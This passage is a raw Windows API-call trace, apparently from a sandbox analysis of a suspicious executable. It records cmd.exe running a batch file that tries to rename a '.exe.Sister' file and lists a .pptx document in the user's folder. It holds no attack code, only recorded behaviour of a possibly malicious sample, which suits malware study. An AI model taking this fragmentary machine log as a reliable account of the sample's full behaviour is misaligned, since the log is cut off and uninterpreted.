Size=0xae) returned 0x21ed93b5430 [0305.283] GetProcessHeap () returned 0x21ed8c70000 [0305.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b60f0 [0305.283] ??_V@YAXPEAX@Z () returned 0x1 [0305.283] malloc (_Size=0x1ff9c) returned 0x21eda25fd40 [0305.283] GetProcessHeap () returned 0x21ed8c70000 [0305.284] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b6630 [0305.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda25fd40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0305.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7720 [0305.284] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.284] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7c60 [0305.284] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0305.284] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc75a0 [0305.285] FindClose (in: hFindFile=0x21ed8cc75a0 | out: hFindFile=0x21ed8cc75a0) returned 1 [0305.285] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0305.285] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.285] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.285] GetProcessHeap () returned 0x21ed8c70000 [0305.285] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67ab0 [0305.286] ??_V@YAXPEAX@Z () returned 0x1 [0305.286] ??_V@YAXPEAX@Z () returned 0x1 [0305.286] GetProcessHeap () returned 0x21ed8c70000 [0305.286] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d339b0, Size=0x490) returned 0x21ed8d339b0 [0305.286] GetProcessHeap () returned 0x21ed8c70000 [0305.286] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d339b0) returned 0x490 [0305.286] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0305.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.286] GetFileType (hFile=0x50) returned 0x2 [0305.286] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.286] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0305.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.287] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0305.294] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.294] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.294] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0305.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.295] GetFileType (hFile=0x50) returned 0x2 [0305.295] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.295] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0305.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.295] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0305.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.303] GetFileType (hFile=0x50) returned 0x2 [0305.303] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.303] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.304] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d33980*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d33980*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0305.305] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0305.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.305] GetFileType (hFile=0x50) returned 0x2 [0305.305] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.305] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0305.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.305] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0305.313] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0305.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.313] GetFileType (hFile=0x50) returned 0x2 [0305.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.313] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.314] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0305.319] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.320] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.320] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.320] malloc (_Size=0xffce) returned 0x21eda25fd40 [0305.320] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.320] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.320] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.322] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.322] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.323] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.323] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.323] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.323] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.323] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.323] ??_V@YAXPEAX@Z () returned 0x1 [0305.323] GetProcessHeap () returned 0x21ed8c70000 [0305.323] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e420 [0305.323] GetProcessHeap () returned 0x21ed8c70000 [0305.323] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e420, Size=0x130) returned 0x21ed93b1cf0 [0305.324] GetProcessHeap () returned 0x21ed8c70000 [0305.324] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1cf0) returned 0x130 [0305.324] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.324] malloc (_Size=0xffce) returned 0x21eda25fd40 [0305.324] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.324] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.324] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda25fd40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0305.326] ??_V@YAXPEAX@Z () returned 0x1 [0305.326] GetProcessHeap () returned 0x21ed8c70000 [0305.326] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b1070 [0305.326] GetProcessHeap () returned 0x21ed8c70000 [0305.326] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eb40 [0305.326] GetProcessHeap () returned 0x21ed8c70000 [0305.327] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eb40, Size=0x130) returned 0x21ed93b1930 [0305.327] GetProcessHeap () returned 0x21ed8c70000 [0305.327] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1930) returned 0x130 [0305.327] malloc (_Size=0xffce) returned 0x21eda25fd40 [0305.327] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.327] GetProcessHeap () returned 0x21ed8c70000 [0305.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7060 [0305.327] GetProcessHeap () returned 0x21ed8c70000 [0305.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d591a0 [0305.327] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.327] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.327] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.328] GetLastError () returned 0x2 [0305.328] GetProcessHeap () returned 0x21ed8c70000 [0305.328] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed933ffc0 [0305.328] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed933ffd0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.328] SetErrorMode (uMode=0x0) returned 0x0 [0305.329] SetErrorMode (uMode=0x1) returned 0x0 [0305.329] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda25fd40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0305.329] SetErrorMode (uMode=0x0) returned 0x1 [0305.329] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0305.329] GetProcessHeap () returned 0x21ed8c70000 [0305.329] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d59410 [0305.329] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.329] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.329] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.330] GetLastError () returned 0x2 [0305.330] ??_V@YAXPEAX@Z () returned 0x1 [0305.330] malloc (_Size=0xffce) returned 0x21eda25fd40 [0305.330] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.330] malloc (_Size=0xffce) returned 0x21eda26fd20 [0305.330] ??_V@YAXPEAX@Z () returned 0x21eda26fd20 [0305.330] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.330] GetLastError () returned 0x2 [0305.330] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.330] GetFileType (hFile=0x54) returned 0x2 [0305.330] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0305.330] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0305.331] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.332] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0305.332] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.332] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.333] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.340] longjmp () [0305.340] ??_V@YAXPEAX@Z () returned 0x1 [0305.340] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e7917e0, ftCreationTime.dwHighDateTime=0x1d5ec7e, ftLastAccessTime.dwLowDateTime=0xfac4b9a0, ftLastAccessTime.dwHighDateTime=0x1d5ef01, ftLastWriteTime.dwLowDateTime=0xfac4b9a0, ftLastWriteTime.dwHighDateTime=0x1d5ef01, nFileSizeHigh=0x0, nFileSizeLow=0x180ae, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="PXw-KbUDGxcG.pptx", cAlternateFileName="")) returned 1 [0305.340] GetProcessHeap () returned 0x21ed8c70000 [0305.340] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x1da) returned 0x21ed8c758a0 [0305.340] GetProcessHeap () returned 0x21ed8c70000 [0305.340] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x1da [0305.340] GetProcessHeap () returned 0x21ed8c70000 [0305.340] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d33e50 [0305.341] GetProcessHeap () returned 0x21ed8c70000 [0305.341] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d33e50, Size=0x30) returned 0x21ed8d33e50 [0305.341] GetProcessHeap () returned 0x21ed8c70000 [0305.341] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d33e50) returned 0x30 [0305.341] GetProcessHeap () returned 0x21ed8c70000 [0305.341] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d33e90 [0305.341] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.341] GetProcessHeap () returned 0x21ed8c70000 [0305.341] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8b10 [0305.342] ??_V@YAXPEAX@Z () returned 0x1 [0305.342] GetProcessHeap () returned 0x21ed8c70000 [0305.342] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d33e90, Size=0x190) returned 0x21ed8d33e90 [0305.342] GetProcessHeap () returned 0x21ed8c70000 [0305.342] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d33e90) returned 0x190 [0305.342] GetProcessHeap () returned 0x21ed8c70000 [0305.342] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34030 [0305.342] GetProcessHeap () returned 0x21ed8c70000 [0305.342] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34030, Size=0x290) returned 0x21ed8d34030 [0305.342] GetProcessHeap () returned 0x21ed8c70000 [0305.342] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34030) returned 0x290 [0305.342] GetProcessHeap () returned 0x21ed8c70000 [0305.342] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d342d0 [0305.342] GetProcessHeap () returned 0x21ed8c70000 [0305.343] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d342d0, Size=0x30) returned 0x21ed8d342d0 [0305.343] GetProcessHeap () returned 0x21ed8c70000 [0305.343] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d342d0) returned 0x30 [0305.343] GetProcessHeap () returned 0x21ed8c70000 [0305.343] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34310 [0305.343] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.343] GetProcessHeap () returned 0x21ed8c70000 [0305.343] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8c10 [0305.343] ??_V@YAXPEAX@Z () returned 0x1 [0305.343] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.343] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7c60 [0305.344] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0305.345] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7c60 [0305.345] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0305.345] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe091bbff, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe091bbff, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc75a0 [0305.345] FindClose (in: hFindFile=0x21ed8cc75a0 | out: hFindFile=0x21ed8cc75a0) returned 1 [0305.345] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.346] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\PXw-KbUDGxcG.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e7917e0, ftCreationTime.dwHighDateTime=0x1d5ec7e, ftLastAccessTime.dwLowDateTime=0xfac4b9a0, ftLastAccessTime.dwHighDateTime=0x1d5ef01, ftLastWriteTime.dwLowDateTime=0xfac4b9a0, ftLastWriteTime.dwHighDateTime=0x1d5ef01, nFileSizeHigh=0x0, nFileSizeLow=0x180ae, dwReserved0=0x4, dwReserved1=0x7, cFileName="PXw-KbUDGxcG.pptx", cAlternateFileName="PXW-KB~1.PPT")) returned 0x21ed8cc7f00 [0305.346] FindClose (in: hFindFile=0x21ed8cc7f00 | out: hFindFile=0x21ed8cc7f00) returned 1 [0305.346] _wcsnicmp (_String1="PXW-KB~1.PPT", _String2="PXw-KbUDGxcG.pptx", _MaxCount=0x11) returned 9 [0305.346] malloc (_Size=0x1ff9c) returned 0x21eda27fd00 [0305.347] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.348] GetProcessHeap () returned 0x21ed8c70000 [0305.348] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed8cc8b50 [0305.348] ??_V@YAXPEAX@Z () returned 0x1 [0305.348] ??_V@YAXPEAX@Z () returned 0x1 [0305.348] GetProcessHeap () returned 0x21ed8c70000 [0305.348] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34310, Size=0x188) returned 0x21ed8d34310 [0305.348] GetProcessHeap () returned 0x21ed8c70000 [0305.348] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34310) returned 0x188 [0305.349] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.349] GetFileType (hFile=0x50) returned 0x2 [0305.349] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.349] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.349] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.357] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.357] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.357] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.357] GetFileType (hFile=0x50) returned 0x2 [0305.357] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.357] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.358] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.358] GetFileType (hFile=0x50) returned 0x2 [0305.358] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.359] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.359] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d33e60*, 